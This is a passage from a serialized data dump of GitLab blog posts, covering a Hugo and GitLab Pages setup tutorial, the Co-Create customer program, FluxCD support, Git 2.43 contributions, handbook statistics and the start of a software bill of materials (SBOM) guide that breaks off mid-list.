allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n### 1. Create the new project\n\nFor this example, we'll use the [Hugo](https://gohugo.io/) template, our most popular one. Simply go to the GitLab home page, and select \"New Project\" from the top right. Click on \"Create from template,\" click on the Hugo template, and then click on \"Use template.\" Give it a name like `namespace.gitlab.io`, where `namespace` is your `username` or `groupname`.\n\n### 2. Run your first pipeline\n\nWe need to make one quick edit, which will naturally kick off a pipeline and deploy our site for the first time. What we need to do is edit our `config.toml` to have the same URL that we set up in the project name. To do this we will go to Repository → Files, click on the `config.toml` file, and then click on \"Edit\" in the toolbar. All we need to do is change the `baseurl = \"https://pages.gitlab.io/hugo/\"` line to `baseurl = \"https://namespace.gitlab.io/\"` (again, replacing `namespace` with your `username` or `groupname`).\n\nCommit your changes, then head over to CI/CD → Pipelines and look for the new pipeline that's running. You can click on the status to see the build log, or just wait for it to finish – you might be surprised at how fast this is! Once the pipeline passes, we're good to go. It may take a minute or two for everything to work through replication, but once it does, you can see your new site at `https://namespace.gitlab.io/`, beautiful template included, just waiting for you to customize further.\n\n### 3. Where to go next\n\nThere's a lot of basic configuration for your site in the `config.toml`, check that out and see what you might like to modify. The about page is in `/content/page/about.md`, and you can see example posts for your blog in `/content/post` – feel free to delete these when you're done with them. Since these are written in [markdown](https://docs.gitlab.com/ee/user/markdown.html) they are a piece of cake to edit or add new ones. Getting started with Hugo is a bit out of scope for this post, but I assure you it's quite straightforward. You can check out the [Hugo getting started pages](https://gohugo.io/getting-started/) for more ideas on what you can do. Be sure also to check out [Hugo themes](https://gohugo.io/themes/) if you're looking for inspiration.\n\nHopefully this was helpful in getting you started. Good luck with your new site!\n\nCover image by José Alejandro Cuffia(https://unsplash.com/@alecuffia) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1037,1099,803,9],{"slug":4790,"featured":6,"template":689},"start-using-pages-quickly","content:en-us:blog:start-using-pages-quickly.yml","Start Using Pages Quickly","en-us/blog/start-using-pages-quickly.yml","en-us/blog/start-using-pages-quickly",{"_path":4796,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4797,"content":4803,"config":4809,"_id":4811,"_type":14,"title":4812,"_source":16,"_file":4813,"_stem":4814,"_extension":19},"/en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"title":4798,"description":4799,"ogTitle":4798,"ogDescription":4799,"noIndex":6,"ogImage":4800,"ogUrl":4801,"ogSiteName":673,"ogType":674,"canonicalUrls":4801,"schema":4802},"The Co-Create Program: How customers are collaborating to build GitLab","Learn how organizations like Thales, Scania, and Kitware are partnering with GitLab engineers to contribute meaningful features that benefit the entire community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659756/Blog/Hero%20Images/REFERENCE_-_display_preview_for_blog_images.png","https://about.gitlab.com/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Co-Create Program: How customers are collaborating to build GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"}],\n        \"datePublished\": \"2025-01-30\",\n      }",{"title":4798,"description":4799,"authors":4804,"heroImage":4800,"date":4805,"body":4806,"category":4807,"tags":4808},[1372],"2025-01-30","This past year, over 800 community members have made more than 3,000 contributions to GitLab. These contributors include team members from global organizations like Thales, Scania, and Kitware, who are helping shape GitLab's future through the [Co-Create Program](https://about.gitlab.com/community/co-create/) — GitLab's collaborative development program where customers work directly with GitLab engineers to contribute meaningful features to the platform.\n\nThrough workshops, pair programming sessions, and ongoing support, program participants get hands-on experience with GitLab's architecture and codebase while solving issues or improving existing features.\n\n\"Our experience with the Co-Create Program has been incredible,\" explains Sébastien Lejeune, open source advocate at Thales. \"It only took two months between discussing our contribution with a GitLab Contributor Success Engineer and getting it live in the GitLab release.\"\n\nIn this post, we'll explore how customers have leveraged the Co-Create Program to turn their ideas into code, learning and contributing along the way.\n\n## The Co-Create experience\n[The GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) helps contributors get started developing on GitLab. \"The advice I would give new contributors is to remember that you can't break anything with the GDK,\" says Hook. \"If you make a change and it doesn't work, you can undo it or start again. The beauty of GDK is that you can tinker, test, and learn without worrying about the environment.\"\n\nEach participating organization in the Co-Create Program receives support throughout their contribution journey:\n\n- __Technical onboarding workshop__: A dedicated session to set up the GitLab Development Kit (GDK) and understand GitLab's architecture\n- __1:1 engineering support__: Access to GitLab engineers for pair programming and technical guidance\n- __Architecture deep dives__: Focused sessions on specific GitLab components relevant to the issue the organization is contributing to\n- __Code review support__: Detailed feedback and guidance through the merge request process\n- __Regular check-ins__: Ongoing collaboration to ensure progress and address any challenges\n\nThis structure ensures that teams can contribute effectively, regardless of their prior experience with GitLab's codebase or the Ruby/Go programming language. As John Parent from Kitware notes, \"If you've never seen or worked with GitLab before, you're staring at a sophisticated architecture and so much code across different projects. The Co-Create Program helps distill what would take weeks of internal training into a targeted crash course.\"\n\nThe result is a program that not only helps deliver new features but also builds lasting relationships between GitLab and its user community. \"It's inspiring for our engineers to see the passion our customers bring to contributing to and building GitLab together,\" shares Shekhar Patnaik, principal engineer at GitLab. \"Customers get to see the 'GitLab way,' and engineers get to witness their commitment to shaping the future of GitLab.\"\n\n## Enhancing project UX with Thales\nWhen Thales identified opportunities to improve GitLab's empty project UI, they didn't just file a feature request — they built the solution themselves. Their contributions focused on streamlining the new project setup experience by simplifying SSH/HTTPS configuration with a tabbed interface and adding copy/paste functionality for the code snippets. These changes had a significant impact on developer workflows.\n\nThe team's impact extended beyond the UX improvements. Quentin Michaud, PhD fellow for cloud applications on the edge at Thales, contributed to improving the GitLab Development Kit (GDK). As a package maintainer for Arch Linux, Michaud's expertise helped improve GDK's documentation and support its containerization efforts, making it easier for future contributors to get started.\n\n\"My open source experience helped me troubleshoot GDK's support for Linux distros,” says Michaud. “While improving package versioning documentation, I saw that GitLab's Contributor Success team was also working to set up GDK into a container. Seeing our efforts converge was a great moment for me — it showed how open source collaboration can help build better solutions.\"\n\nThe positive experience for the Thales team means that Lejeune now uses the Co-Create Program as \"a powerful example to show our managers the return on investment from open source contributions.\"\n\n## Advancing package support with Scania\nWhen Scania needed advanced package support in GitLab, they saw an opportunity to contribute and build it themselves. \n\n\"As long-time GitLab users who actively promote open source within our organization, the Co-Create Program gave us a meaningful way to contribute directly to open source,\" shares Puttaraju Venugopal Hassan, solution architect at Scania.\n\nThe team started with smaller changes to familiarize themselves with the codebase and review process, then progressed to larger features. \"One of the most rewarding aspects of the Co-Create Program has been looking back at the full, end-to-end process and seeing how far we've come,\" reflects Océane Legrand, software developer at Scania. \"We started with discovery and smaller changes, but we took on larger tasks over time. It's great to see that progression.\" \n\nTheir contributions include bug fixes for the package registry and efforts to enhance the Conan package registry feature set, bringing it closer to general availability (GA) readiness while implementing Conan version 2 support. Their work and collaboration with GitLab demonstrates how the Co-Create Program can drive significant improvements to GitLab’s package registry capabilities.\n\n\"From the start, our experience with the Co-Create Program was very organized. We had training sessions that guided us through everything we needed to contribute. One-on-one sessions with a GitLab engineer also gave us an in-depth look at GitLab’s package architecture, which made the contribution process much smoother,\" said Juan Pablo Gonzalez, software developer at Scania. \n\nThe impact of the program goes beyond code — program participants are also building valuable skills as a direct result of their contributions. In [the GitLab 17.8 release](https://about.gitlab.com/releases/2025/01/16/gitlab-17-8-released/#mvp), both Legrand and Gonzalez were recognized as GitLab MVPs. Legrand talked about how the work she's doing in open source impacts both GitLab and Scania, including building new skills for her and her team: \"Contributing through the Co-Create Program has given me new skills, like experience with Ruby and background migrations. When my team at Scania faced an issue during an upgrade, I was able to help troubleshoot because I'd already encountered it through the Co-Create Program.\"\n\n## Optimizing authentication for high-performance computing with Kitware\nKitware brought specialized expertise from their work with national laboratories to improve GitLab's authentication framework. Their contributions included adding support for the OAuth2 device authorization grant flow in GitLab, as well as implementing new database tables, controllers, views, and documentation. This contribution enhances GitLab's authentication options, making it more versatile for devices without browsers or with limited input capabilities.\n\n\"The Co-Create Program is the most efficient and effective way to contribute to GitLab as an external contributor,\" shares John Parent, R&D engineer at Kitware. \"Through developer pairing sessions, we found better implementations that we might have missed working alone.\"\n\nAs a long-time open source contributor, Kitware particularly appreciated GitLab's approach to development. \"I assumed GitLab wouldn't rely on out-of-the-box solutions at its scale, but seeing them incorporate a Ruby dependency instead of building a custom in-house solution was great,” says Parent. “Coming from the C++ world, where package managers are rare, it was refreshing to see this approach and how straightforward it could be.\"\n\n## Building better together: Benefits of Co-Create\nThe Co-Create Program creates value that flows both ways. \"The program bridges a gap between us as GitLab engineers and our customers,\" explains Imre Farkas, staff backend engineer at GitLab. \"As we work with them, we hear their day-to-day challenges, the parts of GitLab they rely on, and where improvements can be made. It's great to see how enthusiastic they are about getting involved in building GitLab with us.\"\n\nThis collaborative approach also accelerates GitLab's development. As Shekhar Patnaik, principal engineer at GitLab, observes: \"Through Co-Create, our customers are helping us move our roadmap forward. Their contributions allow us to deliver critical features faster, benefitting our entire user base. As the program scales, there's a real potential to accelerate development on our most impactful features by working alongside the very people who rely on them.\"\n\n## Get started with Co-Create\nReady to turn your feature requests into reality? Whether you're looking to enhance GitLab's UI like Thales, improve package support like Scania, or optimize authentication like Kitware, the Co-Create Program welcomes organizations who want to actively shape GitLab's future while building valuable open source experience.\n\nContact your GitLab representative to learn more about participating in the Co-Create Program, or visit our [Co-Create page](https://about.gitlab.com/community/co-create/) for more information.\n","customer-stories",[708,9,974],{"slug":4810,"featured":91,"template":689},"the-co-create-program-how-customers-are-collaborating-to-build-gitlab","content:en-us:blog:the-co-create-program-how-customers-are-collaborating-to-build-gitlab.yml","The Co Create Program How Customers Are Collaborating To Build Gitlab","en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab.yml","en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"_path":4816,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4817,"content":4822,"config":4827,"_id":4829,"_type":14,"title":4830,"_source":16,"_file":4831,"_stem":4832,"_extension":19},"/en-us/blog/the-continued-support-of-fluxcd-at-gitlab",{"title":4818,"description":4819,"ogTitle":4818,"ogDescription":4819,"noIndex":6,"ogImage":1090,"ogUrl":4820,"ogSiteName":673,"ogType":674,"canonicalUrls":4820,"schema":4821},"The continued support of FluxCD at GitLab","GitLab is committed to working with other partners to make sure that Flux remains a stable, reliable, and mature Cloud Native Computing Foundation project.\n","https://about.gitlab.com/blog/the-continued-support-of-fluxcd-at-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The continued support of FluxCD at GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Viktor Nagy\"}],\n        \"datePublished\": \"2024-03-05\",\n      }",{"title":4818,"description":4819,"authors":4823,"heroImage":1090,"date":4824,"body":4825,"category":930,"tags":4826},[1012],"2024-03-05","Last month, Weaveworks CEO Alexis Richardson [announced publicly](https://www.linkedin.com/posts/richardsonalexis_hi-everyone-i-am-very-sad-to-announce-activity-7160295096825860096-ZS67) the company, which is the main sponsor of FluxCD, is closing its doors and shutting down its commercial operations.\n\nGitLab made a strategic decision in early 2023 [to integrate FluxCD with its agent for Kubernetes offering](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/) as the recommended GitOps solution. While we were sad to see the news about Weaveworks, the company, it in no way changes our commitment to FluxCD, the project, and its ability to drive efficiencies for our customers. FluxCD is a mature, enterprise-ready GitOps solution with a modern, modular architecture and clean codebase that lends itself for integration and requires minimal maintenance.\n\nIn the past month, we have had discussions with a number of companies that built their tooling around FluxCD, and together we are certain that FluxCD is a solution we want to continue to support and rely upon. We looked into switching to alternatives, but decided against other options. We are confident in the future of Flux. Flux is a mature Cloud Native Computing Foundation (CNCF) project with a large and dedicated user base. We believe that our continued support and integration with Flux serves our users the best.\n\nUnfortunately, such an organizational change affects the status of the Flux maintainers. At GitLab, we are committed to open source. When we decided to integrate with Flux, we knew that, sooner or later, we would like to have FluxCD maintainers within GitLab. Given the recent changes, we are committed even more to playing an active role in the Flux community and we want to support FluxCD for enterprise customers.\n\n> “GitLab is a proven platform for software delivery, and I am really pleased to see their leadership standing up to help and support Flux. As the inventors of GitOps and FluxCD, I know that Weaveworks people and all our customers will want to see this. For my part, I’m more confident in the future of Flux than ever, and I’m happy to see GitLab being one of the companies working on enterprise Flux support.” - Alexis Richardson, CEO, Weaveworks\n\nAs these are turbulent times in the Flux community, we are working closely with other partners to make sure that Flux remains a stable, reliable, and mature CNCF project.\n\n> Read more about [our FluxCD integration](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/).\n",[845,930,9,803],{"slug":4828,"featured":91,"template":689},"the-continued-support-of-fluxcd-at-gitlab","content:en-us:blog:the-continued-support-of-fluxcd-at-gitlab.yml","The Continued Support Of Fluxcd At Gitlab","en-us/blog/the-continued-support-of-fluxcd-at-gitlab.yml","en-us/blog/the-continued-support-of-fluxcd-at-gitlab",{"_path":4834,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4835,"content":4841,"config":4846,"_id":4848,"_type":14,"title":4849,"_source":16,"_file":4850,"_stem":4851,"_extension":19},"/en-us/blog/the-contributions-we-made-to-the-git-2-43-release",{"title":4836,"description":4837,"ogTitle":4836,"ogDescription":4837,"noIndex":6,"ogImage":4838,"ogUrl":4839,"ogSiteName":673,"ogType":674,"canonicalUrls":4839,"schema":4840},"The contributions we made to the Git 2.43 release","Git 2.43 included some improvements from GitLab's Git team. Here are some highlights from the work the team has done on Git and why it matters.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659507/Blog/Hero%20Images/AdobeStock_623844718.jpg","https://about.gitlab.com/blog/the-contributions-we-made-to-the-git-2-43-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The contributions we made to the Git 2.43 release\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2024-01-11\",\n      }",{"title":4836,"description":4837,"authors":4842,"heroImage":4838,"date":4843,"body":4844,"category":10,"tags":4845},[1512],"2024-01-11","[Git 2.43](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.43.0.txt)\nwas officially released on November 20, 2023, and included some improvements from GitLab's Git team. Here are some highlights from the work our team has\ndone on Git and why it matters.\n\n## Segmenting objects across packfiles\n\nIn Git 2.43, [Christian Couder](https://about.gitlab.com/company/team/#chriscool)\nadded a `--filter` option to the `git repack` command. Supported filter (see the\n[filter-spec docs](https://git-scm.com/docs/git-rev-list#Documentation/git-rev-list.txt---filterltfilter-specgt)) can be added to the `git repack --filter` flag. This will cause the filtered out objects to be\npacked into a separate packfile.\n\nA `--filter-to` option was also added. Providing this option will cause Git to write the filtered packfile to the specified location on the filesystem.\n\n### Why it matters\n\nGitaly servers host Git repositories and incur storage costs. In many repositories however, not all the objects need to be accessed all the time. Allowing Git to\noffload some repository data onto a different packfile paves the way for storage optimizations whereby we can choose to segment the Git repository data and place\ncertain kinds of objects on cheaper storage such as slower disks or object storage.\n\n## Checking object existence\n\nIn Git, to check the existence of an object one would have to rely on Git returning an error if it couldn’t find an object. However, to date, there has not been a generic way in Git to check the existence of an object. There were certain edge cases that were not handled well by the underlying Git code. For example, if a reference exists as a symbolic reference, but its target branch does not exist.\n\n[Patrick Steinhardt](https://about.gitlab.com/company/team/#pks-gitlab) added the `--exists` option to `git show` as a generic way to check for object existence.\n\n### Why it matters\n\nThe Gitaly team has started work to upstream the [reftable backend](https://gitlab.com/groups/gitlab-org/-/epics/11652) into the Git project. This new flag enables consistent validation of object existence to fix a number of tests to work with the reftables backend.\n\n## Find missing commit objects \n\n`git rev-list`'s `--missing` option provides information about objects that are referenced but are missing from a repository. Up to this release however, this option only worked with blobs and trees. Missing commits would cause `git rev-list` to fail with a fatal error.\n\nIn Git 2.43, [Karthik Nayak](https://about.gitlab.com/company/team/#knayakgl)\nextended the `--missing` option to work with commit objects.\n\n### Why it matters\n\nGitaly's next-generation repository replication implementation relies on a [write\nahead log](https://gitlab.com/groups/gitlab-org/-/epics/8911) (WAL) that logs every write to a repository.\n\nThe upcoming WAL creates separate log entries per transaction – as such, some transactions contain reference updates. In these transactions, it is necessary to identify new git objects being added to the repository. The WAL implementation uses a quarantine directory to stage these new objects. \n\nWe can now use git-rev-list(1) along with the --missing flag, to identify all the objects that are newly added and required and also boundary commits that connect the quarantine directory to the main object directory.\n\n## Read gitattributes from HEAD in bare repos\n\nStarting in 2.43, [John Cai](https://about.gitlab.com/company/team/#jcaigitlab)\nmade a change that allows [Git attributes](https://git-scm.com/docs/gitattributes) to start to read attributes from the tree that HEAD points to by default, in bare repositories.\n\n### Why it matters\n\nTo reduce some tech debt around how git attributes are read in a repository, we added the ability to pass a tree object directly to Git through the [`--attr-source` flag](https://git-scm.com/docs/git#Documentation/git.txt---attr-sourcelttree-ishgt).\n\nPassing in `HEAD` to `--attr-source` would fail however, when `HEAD` pointed to and unborn branch, Gitaly would have needed to use a separate call to check if `HEAD` were unborn before passing it in.\n\nThis change not only causes Git to read attributes from `HEAD` by default, which means we don't need to pass in anything, but also silently ignores it if `HEAD` is unborn, which is the behavior we want in Gitaly. This way, we don't need to make any code changes in Gitaly for this to work.\n\nThis leads to simplification on the Gitaly side, as we seek to remove some [technical debt around gitattributes](https://gitlab.com/groups/gitlab-org/-/epics/9006)\nput in during a time when Git lacked support around reading gitattributes in bare repositories.\n\n## Bug fixes\n\n[Patrick Steinhardt](https://about.gitlab.com/company/team/#pks-gitlab) fixed a bug in `git rev-list –stdin`.  \n\nSteinhardt also addressed an existing issue in [commit-graphs](https://git-scm.com/docs/commit-graph) whereby commits parsed from the commit-graph weren’t always checked for existence. A `GIT_COMMIT_GRAPH_PARANOIA` environment variable can now be turned on to always check for object existence.",[267,9,751],{"slug":4847,"featured":6,"template":689},"the-contributions-we-made-to-the-git-2-43-release","content:en-us:blog:the-contributions-we-made-to-the-git-2-43-release.yml","The Contributions We Made To The Git 2 43 Release","en-us/blog/the-contributions-we-made-to-the-git-2-43-release.yml","en-us/blog/the-contributions-we-made-to-the-git-2-43-release",{"_path":4853,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4854,"content":4860,"config":4867,"_id":4869,"_type":14,"title":4870,"_source":16,"_file":4871,"_stem":4872,"_extension":19},"/en-us/blog/the-gitlab-handbook-by-numbers",{"title":4855,"description":4856,"ogTitle":4855,"ogDescription":4856,"noIndex":6,"ogImage":4857,"ogUrl":4858,"ogSiteName":673,"ogType":674,"canonicalUrls":4858,"schema":4859},"The GitLab handbook by numbers","Two GitLab team-members take a fresh look at GitLab's open source team handbook, charting its evolution over the years to the weighty tome it is today.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670434/Blog/Hero%20Images/handbook-cover.jpg","https://about.gitlab.com/blog/the-gitlab-handbook-by-numbers","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The GitLab handbook by numbers\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lukas Eipert\"},{\"@type\":\"Person\",\"name\":\"Lee Matos\"}],\n        \"datePublished\": \"2019-04-24\",\n      }",{"title":4855,"description":4856,"authors":4861,"heroImage":4857,"date":4864,"body":4865,"category":299,"tags":4866},[4862,4863],"Lukas Eipert","Lee Matos","2019-04-24","\nSharing and retrieving information is a crucial part of everyday work life.\nWhere do you get information from, be it about hiring processes, social media guidelines, or reporting expenses?\nAt GitLab, all of that can be found in [the handbook](https://handbook.gitlab.com/) – have a look, it's public!\n[Sid](/company/team/#sytses), our CEO, [wrote about the importance and the open sourcing of our handbook][sid-blog-post] about two and a half years ago.\nBack then we were just shy of 100 employees.\nIn this post we will look at how the handbook has developed over time, how we interact with it,\nand how it still works for over 550 employees.\n\n[sid-blog-post]: /blog/our-handbook-is-open-source-heres-why/\n\n## One book to guide them all\n\nAt the time of writing, the handbook contains about 605,000 words.\nWhile probably a bit less captivating than the tales of Frodo and Middle Earth,\nwe have composed more pages than \"The Lord of the Rings\" and \"The Hobbit\" combined, since the [first commit][first-commit] in 2015.\nIt would take around 50 hours of continuous reading to cover the whole handbook, front to back.\n\n### Is it overwhelming to read through it all?\n\nIt would be, but as the handbook covers a wide range of topics, you probably don't need to read every single word.\nAs the handbook changes over time it is not necessary to memorize it all, but it is more important to remember how to retrieve information.\nSo as long as you know where to find something, you are on the safe side.\n\n> It would take around 50 hours of continuous reading to cover the whole handbook, front to back\n\n[first-commit]: https://gitlab.com/gitlab-com/www-gitlab-com/blob/2d2ced8f79da96fe981a3a6f6cf5918fa2dd992a/source/team-handbook/index.html\n\n## One book to be written by them all\n\n![Graph showing the growth of the handbook over time (May 2015 - April 2019)](https://about.gitlab.com/images/blogimages/evolution_handbook/handbook-history.png){: .shadow.center}\n*\u003Csmall>Graph showing the growth of the handbook, broken down by subcategory, over time (May 2015 – April 2019)\u003C/small>*\n\nCurrently all knowledge in the handbook is spread across 550 unique web pages, with the average page containing around 1,100 words.\nThe most words have been written in the subcategory engineering (138,000 words), with marketing a close second (115,000 words).\nTypically, as teams grow, more of their processes get documented in the handbook, which leads to a natural growth of the respective category.\n\n> The most words have been written in the subcategory engineering (138,000 words)\n\n### Who contributes to the handbook?\n\nYou might think that there is someone special who writes all those pages, but it's important\nto remember that [everyone can contribute](https://handbook.gitlab.com/handbook/company/mission/) to the handbook. It is actually part of our [onboarding process]\nto improve something about the handbook – whether that's clarifying wording or making it easier to find something.\nNothing is exempt from change; even [our core values are adjusted over the course of time][values-history].\n\n### How do you make changes to the handbook?\n\nIf someone at GitLab or from the wider community wants to change something, they follow a simple workflow that is familiar to every GitLab user:\n\n1. Create a merge request which introduces the change.\n2. Discuss the merge request with the stakeholders.\n3. Iterate on the change and come to an agreement.\n4. Let the merge request be merged.\n\nMore important changes (not every typo of course!) are then announced via Slack or our [company call].\nThe handbook also has its own [changelog] which you can check regularly to see what has been changed over time.\n\n[onboarding process]: https://handbook.gitlab.com/handbook/people-group/general-onboarding/\n[values-history]: https://gitlab.com/gitlab-com/www-gitlab-com/commits/master/source/handbook/values/index.html.md\n[company call]: https://handbook.gitlab.com/handbook/communication/\n[changelog]: https://handbook.gitlab.com/handbook/about/changelog/\n\n## One book to be read by them all\n\nIn 2018 we had several hundred thousand page views on pages in the handbook. It is hard to tell which views come from GitLab team-members and which from the wider community.\nAmong the most-read pages are our [Markdown Guide], the pages about [global compensation], our [values], the [hiring process], our [product], [benefits], and how to [communicate].\nThese pages are topics of general interest to people within and outside the company.\nWhat could be a better resource to potential candidates than those pages that show the inner workings of GitLab?\n\n### How do you find anything in the handbook?\n\nThe handbook has a search function; you can use the [index page](https://handbook.gitlab.com/) as an entry point, or just use your favorite search engine to find information.\nWhenever someone asks a question in our Slack, there is a high probability that someone will answer with a link to the handbook.\nIf someone asks a question that has no answer in the handbook, we highly encourage people to add that information to document it and make it easier for future GitLab team-members to find answers.\n\n> Whenever someone asks a question in our Slack, there is a high probability that someone will answer with a link to the handbook\n\n[Markdown Guide]: https://handbook.gitlab.com/handbook/markdown-guide/\n[global compensation]: https://handbook.gitlab.com/handbook/total-rewards/compensation/\n[product]: https://handbook.gitlab.com/handbook/product/\n[communicate]: https://handbook.gitlab.com/handbook/communication/\n[values]: https://handbook.gitlab.com/handbook/values/\n[benefits]: https://handbook.gitlab.com/handbook/total-rewards/benefits/\n[hiring process]: https://handbook.gitlab.com/handbook/hiring/\n\n## One book to be the future\n\nWe hope that this glimpse into the handbook is as interesting for you as it was for us.\nIn an all-remote company it is especially important to write everything down, so that no matter\nwhere you are in the world or what time zone you choose to work in, the information you need is accessible.\nAt the moment we are happy to say that we think that the handbook works as well for us now as it did with 100 employees.\nIt aligns with our [values] more than ever.\n\nFor us it is the most transparent way to collaborate on documentation of company internals.\nWe are able to efficiently iterate on topics, resulting in more in-depth coverage over time.\nPersonally the authors cannot see many reasons why the handbook should not be able to scale even further.\nEventually it will evolve further, from the three tomes we have today, to a digital encyclopedia.\nWe are definitely excited to see what the future holds!\n\nHave you taken inspiration from our handbook? Let us know by tweeting [@gitlab](https://twitter.com/gitlab).\n\nPhoto by [Beatriz Pérez Moya](https://unsplash.com/photos/XN4T2PVUUgk?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/books?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[779,1099,803,9],{"slug":4868,"featured":6,"template":689},"the-gitlab-handbook-by-numbers","content:en-us:blog:the-gitlab-handbook-by-numbers.yml","The Gitlab Handbook By Numbers","en-us/blog/the-gitlab-handbook-by-numbers.yml","en-us/blog/the-gitlab-handbook-by-numbers",{"_path":4874,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4875,"content":4881,"config":4887,"_id":4889,"_type":14,"title":4890,"_source":16,"_file":4891,"_stem":4892,"_extension":19},"/en-us/blog/the-ultimate-guide-to-sboms",{"title":4876,"description":4877,"ogTitle":4876,"ogDescription":4877,"noIndex":6,"ogImage":4878,"ogUrl":4879,"ogSiteName":673,"ogType":674,"canonicalUrls":4879,"schema":4880},"The ultimate guide to SBOMs","Learn what a software bill of materials is and why it has become an integral part of modern software development.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664571/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","https://about.gitlab.com/blog/the-ultimate-guide-to-sboms","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The ultimate guide to SBOMs\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-10-25\",\n      }",{"title":4876,"description":4877,"authors":4882,"heroImage":4878,"date":4883,"body":4884,"category":865,"tags":4885,"updatedDate":4886},[862],"2022-10-25","In today's rapidly evolving digital landscape, the emphasis on application security within the software supply chain has never been more critical. The integration of upstream dependencies into software requires transparency and security measures that can be complex to implement and manage. This is where a software bill of materials (SBOM) becomes indispensable.\n\nServing as a comprehensive list of ingredients that make up software components, an SBOM illuminates the intricate web of libraries, tools, and processes used across the development lifecycle. Coupled with vulnerability management tools, an SBOM not only reveals potential vulnerabilities in software products but also paves the way for strategic risk mitigation. Our guide dives deep into SBOMs, their pivotal role in a multifaceted [DevSecOps](/topics/devsecops/) strategy, and strategies for improving your application's SBOM health — all aimed at fortifying your organization's cybersecurity posture in a landscape full of emerging threats.\n\nYou'll learn:\n- [What is an SBOM?](#what-is-an-sbom%3F)\n- [Why SBOMs are important](#why-sboms-are-important)\n- [Types of SBOM data exchange standards](#types-of-sbom-data-exchange-standards)\n- [Benefits of pairing SBOMs and software vulnerability management](#benefits-of-pairing-sboms-and-software-vulnerability-management)\n- [GitLab and dynamic SBOMs](#gitlab-and-dynamic-sboms)\n    - [Scale SBOM generation and management](#scale-sbom-generation-and-management)\n    - [Ingest and merge SBOMs](#ingest-and-merge-sboms)\n    - [Accelerate mitigation for better SBOM health](#accelerate-mitigation-for-better-sbom-health)\n    - [Continuous SBOM analysis](#continuous-sbom-analysis)\n    - [Building trust in SBOMs](#building-trust-in-sboms)\n - [The future of GitLab SBOM functionality](#the-future-of-gitlab-sbom-functionality)\n - [Get started with SBOMs](#get-started-with-sboms)\n - [SBOM FAQ](#sbom-faq)\n\n## What is an SBOM?\n\nAn SBOM is a nested inventory or [list of ingredients that make up software components](https://www.cisa.gov/sbom#). In addition to the components themselves, SBOMs include critical information about the libraries, tools, and processes used to develop, build, and deploy a software artifact.\n\nThe SBOM concept has existed [for more than a decade](https://spdx.dev/about/). However, as part of an effort to implement the National Cyber Strategy that the White House released in 2023, [CISA’s Secure by Design framework](https://www.cisa.gov/securebydesign) is helping guide software manufacturers  to adopt secure-by-design principles and integrate cybersecurity into their products. The U.S. government [issued best practices](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/) that are driving application developers selling to the public sector to include SBOMs with their software packages. The private sector is not far behind, sending SBOMs on the path to ubiquity. \n\nAlthough SBOMs are often created with stand-alone software, platform companies like GitLab are integrating SBOM generation early and deep in the DevSecOps workflow.\n\n![supply chain security sdlc](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673653/Blog/Content%20Images/supply_chain_security_sdlc.png)\n\n## Why SBOMs are important\n\nModern software development is laser-focused on delivering applications at a faster pace and in a more efficient manner. This can lead to developers incorporating code from open source repositories or proprietary packages into their applications.  According to Synopsys’s 2024 Open Source Security and Risk Analysis report, which consolidated findings from more than 1,000 commercial codebases across 17 industries in 2023, 96% of the total codebases contained open source and 84% of codebases assessed for risk contained vulnerabilities.\n\nPulling in code from unknown repositories increases the potential for vulnerabilities that can be exploited by hackers. In fact, the [2020 SolarWinds attack](https://www.techtarget.com/whatis/feature/SolarWinds-hack-explained-Everything-you-need-to-know) was sparked by the activation of a malicious injection of code in a package used by SolarWinds’ Orion product. Customers across the software supply chain were significantly impacted. Other attacks, including the log4j vulnerability that impacted a number of commercial software vendors, cemented the need for a deep dive into application dependencies, including containers and infrastructure, to be able to assess [risk throughout the software supply chain](https://about.gitlab.com/blog/the-ultimate-guide-to-software-supply-chain-security/).\n\nThere is also a cost component to finding and remediating a software security vulnerability that levels up the need for SBOMs, as well as damage to a company’s reputation that a software supply chain attack can incur. SBOMs give you insight into your dependencies and can be used to look for vulnerabilities, and licenses that don’t comply with internal policies.\n\n## Types of SBOM data exchange standards\n\nSBOMs work best when their generation and interpretation of information such as name, version, packager, and more are able to be automated. This happens best if all parties use a standard data exchange format.\n\nThere are two main types of SBOM data exchange standards in use today:\n- [OWASP 